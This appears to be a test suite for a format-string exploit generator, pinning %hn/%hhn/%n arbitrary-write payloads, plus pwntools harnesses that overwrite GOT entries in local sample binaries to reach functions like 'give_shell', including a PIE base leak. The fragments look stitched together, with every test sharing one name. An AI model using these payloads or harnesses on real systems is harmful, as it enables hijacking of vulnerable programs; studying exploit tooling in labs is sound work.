def test(self):
    """Pin the 32-bit payload when ``alignment_bytes=20`` is requested.

    The expected bytes are the exact output of ``generate_fmt_str`` for
    these parameters; any change to the generator's padding or write
    ordering must update this literal deliberately.
    """
    # NOTE(review): ``arch`` is passed as the string "64" here but as the
    # int 64 in the sibling tests -- confirm WriteFmtStr accepts both forms.
    writer = vf.WriteFmtStr(
        value=0x08044008,
        address=0x08046030,
        offset=10,
        alignment_bytes=20,
    )
    expected = b'000000000000000000000`\x04\x082`\x04\x08%16364x%10$hn%51196x%11$hn'
    self.assertEqual(writer.generate_fmt_str(), expected)
def test(self):
    """Pin the default 64-bit payload (``arch="64"``, two-byte writes).

    Four ``%hn`` writes precede the padding and the four 8-byte addresses;
    the literal below is the generator's exact output for these inputs.
    """
    # NOTE(review): ``arch`` is a string here and an int elsewhere in this
    # suite -- confirm the constructor normalises both.
    writer = vf.WriteFmtStr(
        value=0x402010,
        address=0x601030,
        offset=10,
        arch="64",
    )
    expected = b'%8208c%17$hn%57392c%18$hn%65472c%19$hn%65536c%20$hn000000\x10`\x00\x00\x00\x00\x002\x10`\x00\x00\x00\x00\x004\x10`\x00\x00\x00\x00\x006\x10`\x00\x00\x00\x00\x00'
    self.assertEqual(writer.generate_fmt_str(), expected)
def test(self):
    """Pin the 32-bit payload when ``num_writes=4`` forces byte-sized writes.

    The expected output carries four addresses followed by four ``%hhn``
    directives at consecutive argument indices starting at ``offset``.
    """
    writer = vf.WriteFmtStr(
        value=0x08044008,
        address=0x08046030,
        offset=10,
        num_writes=4,
    )
    expected = b'0`\x04\x081`\x04\x082`\x04\x083`\x04\x08%248x%10$hhn%312x%11$hhn%196x%12$hhn%260x%13$hhn'
    self.assertEqual(writer.generate_fmt_str(), expected)
def test(self):
    """Pin the payload when explicit ``write_sizes=[2, 1, 2]`` are given.

    The expected bytes show the mixed ``%hn`` / ``%hhn`` / ``%hn`` sequence
    that the size list maps to; no ``arch`` is passed, so the generator's
    default architecture is exercised.
    """
    writer = vf.WriteFmtStr(
        value=0x402010,
        address=0x601030,
        offset=10,
        write_sizes=[2, 1, 2],
    )
    expected = b'0\x10`\x002\x10`\x003\x10`\x00%8196x%10$hn%304x%11$hhn%57024x%12$hn'
    self.assertEqual(writer.generate_fmt_str(), expected)
def test(self):
    """Pin the 32-bit payload under a ``max_size=30`` budget.

    With this budget the generator still emits two ``%hn`` writes; compare
    with the ``max_size=20`` case, which collapses to a single ``%n``.
    """
    writer = vf.WriteFmtStr(
        value=0x08044008,
        address=0x08046030,
        offset=10,
        max_size=30,
    )
    expected = b'0`\x04\x082`\x04\x08%16384x%10$hn%51196x%11$hn'
    self.assertEqual(writer.generate_fmt_str(), expected)
def test(self):
    """Pin the 32-bit payload when a base is added to ``value``.

    The expected pad counts differ from the plain-value tests, which is
    the observable effect of the base on the written halves.
    """
    # NOTE(review): the keyword is spelled ``valueBase`` here but
    # ``value_base`` in the 64-bit sibling test and in the harness scripts.
    # Confirm which spelling WriteFmtStr actually accepts -- if only
    # ``value_base`` exists, this call raises TypeError rather than
    # exercising the base path.
    writer = vf.WriteFmtStr(
        value=0x00004008,
        address=0x8045060,
        valueBase=0x55440000,
        offset=10,
    )
    expected = b'`P\x04\x08bP\x04\x08%16384x%10$hn%49144x%11$hn'
    self.assertEqual(writer.generate_fmt_str(), expected)
def test(self):
    """Pin the 32-bit payload when ``address_base`` is added to ``address``.

    The leading address bytes in the expected literal (``0`DU`` / ``2`DU``)
    are the little-endian form of ``address + address_base`` and
    ``address + address_base + 2``.
    """
    writer = vf.WriteFmtStr(
        value=0x08044008,
        address=0x00006030,
        address_base=0x55440000,
        offset=10,
    )
    expected = b'0`DU2`DU%16384x%10$hn%51196x%11$hn'
    self.assertEqual(writer.generate_fmt_str(), expected)
def test(self):
    """Pin the 32-bit payload under a tight ``max_size=20`` budget.

    The expected output is a single address followed by one ``%n`` write;
    the pad count is ``value`` minus the four address bytes already
    emitted (0x08044008 - 4 == 134496260).
    """
    writer = vf.WriteFmtStr(
        value=0x08044008,
        address=0x08046030,
        offset=10,
        max_size=20,
    )
    expected = b'0`\x04\x08%134496260x%10$n'
    self.assertEqual(writer.generate_fmt_str(), expected)
def test(self):
    """Pin the 64-bit payload when ``value_base`` is combined with ``arch=64``.

    Four ``%hn`` writes are followed by padding and four 8-byte addresses;
    the expected literal is the generator's exact output.
    """
    writer = vf.WriteFmtStr(
        value=0x001020,
        address=0x601020,
        value_base=0x55440000,
        offset=10,
        arch=64,
    )
    expected = b'%4128c%17$hn%17700c%18$hn%43708c%19$hn%65536c%20$hn00000 \x10`\x00\x00\x00\x00\x00"\x10`\x00\x00\x00\x00\x00$\x10`\x00\x00\x00\x00\x00&\x10`\x00\x00\x00\x00\x00'
    self.assertEqual(writer.generate_fmt_str(), expected)
def test(self):
    """Pin the 64-bit payload under a ``max_size=88`` budget.

    The budget still allows four ``%hn`` writes here; the ``max_size=56``
    sibling test shows the fallback to two ``%n`` writes.
    """
    writer = vf.WriteFmtStr(
        value=0x08044008,
        address=0x08046030,
        offset=10,
        max_size=88,
        arch=64,
    )
    expected = b'%16392c%17$hn%51196c%18$hn%63484c%19$hn%65536c%20$hn00000`\x04\x08\x00\x00\x00\x002`\x04\x08\x00\x00\x00\x004`\x04\x08\x00\x00\x00\x006`\x04\x08\x00\x00\x00\x00'
    self.assertEqual(writer.generate_fmt_str(), expected)
def test(self):
    """Pin the 64-bit payload under a ``max_size=56`` budget.

    At this size the generator drops to two 4-byte ``%n`` writes; the
    second pad count (4160471032) is the wrap-around needed to reach the
    upper half from the running character count.
    """
    writer = vf.WriteFmtStr(
        value=0x08044008,
        address=0x08046030,
        offset=10,
        max_size=56,
        arch=64,
    )
    expected = b'%134496264c%15$n%4160471032c%16$n00000000`\x04\x08\x00\x00\x00\x004`\x04\x08\x00\x00\x00\x00'
    self.assertEqual(writer.generate_fmt_str(), expected)
def test(self):
    """Pin the 64-bit payload when ``num_writes=8`` forces byte-sized writes.

    Eight ``%hhn`` directives at indices 23..30 precede the padding and
    eight consecutive 8-byte addresses.
    """
    writer = vf.WriteFmtStr(
        value=0x402010,
        address=0x601030,
        offset=10,
        arch=64,
        num_writes=8,
    )
    expected = b'%16c%23$hhn%16c%24$hhn%32c%25$hhn%192c%26$hhn%256c%27$hhn%256c%28$hhn%256c%29$hhn%256c%30$hhn000000000000\x10`\x00\x00\x00\x00\x001\x10`\x00\x00\x00\x00\x002\x10`\x00\x00\x00\x00\x003\x10`\x00\x00\x00\x00\x004\x10`\x00\x00\x00\x00\x005\x10`\x00\x00\x00\x00\x006\x10`\x00\x00\x00\x00\x007\x10`\x00\x00\x00\x00\x00'
    self.assertEqual(writer.generate_fmt_str(), expected)
# Local harness for the 64-bit sample binary: the value and target address
# come from the ELF's symbol and GOT tables, the generator builds the bytes,
# and the result is sent to the spawned process.
import vf
from pwn import *

target = process("./vf_64")
elf = ELF("vf_64")
# `offset` is the format-string argument index the generator numbers its
# `%N$` directives from (cf. the unit tests, where offset=10 yields `%10$`).
fs = vf.WriteFmtStr(value=elf.symbols["pwned"], address=elf.got["fflush"], offset=6, arch=64)
fmtStr = fs.generate_fmt_str()
#print("try: %s" % str(fmtStr))
target.sendline(fmtStr)
target.interactive()
# Harness for the position-independent sample binary: the process prints a
# runtime address after "dreaming: ", which is used to recover the load base
# before the generator is given the (base-relative) symbol and GOT values.
import vf
from pwn import *

target = process("./vf_pie")
elf = ELF("vf_pie")
leak = target.recvline()
# NOTE(review): split()[1] raises IndexError if the marker is absent; the
# harness assumes the first output line always carries it.
leak = leak.split(b"dreaming: ")[1]
leak = leak.strip(b"\n")
# Load base = leaked runtime address of main minus its static offset.
pieBase = int(leak, 16) - elf.symbols["main"]
print("pie base: %s" % hex(pieBase))
# Both the written value and the written-to address are rebased the same way.
fs = vf.WriteFmtStr(value=elf.symbols["pwned"], address=elf.got["fflush"], value_base=pieBase, address_base=pieBase, offset=6)
fmtStr = fs.generate_fmt_str()
print("try: %s" % str(fmtStr))
target.sendline(fmtStr)
target.interactive()
# Harness for the "format1" sample binary; same shape as the vf_64 harness
# but with a different argument offset and symbol/GOT pair.
from pwn import *
import vf

target = process("format1")
elf = ELF("format1")
fs = vf.WriteFmtStr(value=elf.symbols["give_shell"], address=elf.got["printf"], offset=8, arch=64)
fmt_st = fs.generate_fmt_str()
target.sendline(fmt_st)
target.interactive()
def test(self):
    """Pin the 64-bit payload for an explicit six-entry ``write_sizes`` list.

    The expected literal alternates ``%hn`` and ``%hhn`` exactly as the
    size list dictates, at argument indices 21..26, followed by padding
    and six 8-byte addresses.
    """
    writer = vf.WriteFmtStr(
        value=0x402010,
        address=0x601030,
        offset=10,
        arch=64,
        write_sizes=[2, 1, 2, 1, 2, 2],
    )
    expected = b'%8208c%21$hn%304c%22$hhn%57024c%23$hn%256c%24$hhn%65280c%25$hn%65536c%26$hn00000000000000\x10`\x00\x00\x00\x00\x002\x10`\x00\x00\x00\x00\x003\x10`\x00\x00\x00\x00\x005\x10`\x00\x00\x00\x00\x006\x10`\x00\x00\x00\x00\x008\x10`\x00\x00\x00\x00\x00'
    self.assertEqual(writer.generate_fmt_str(), expected)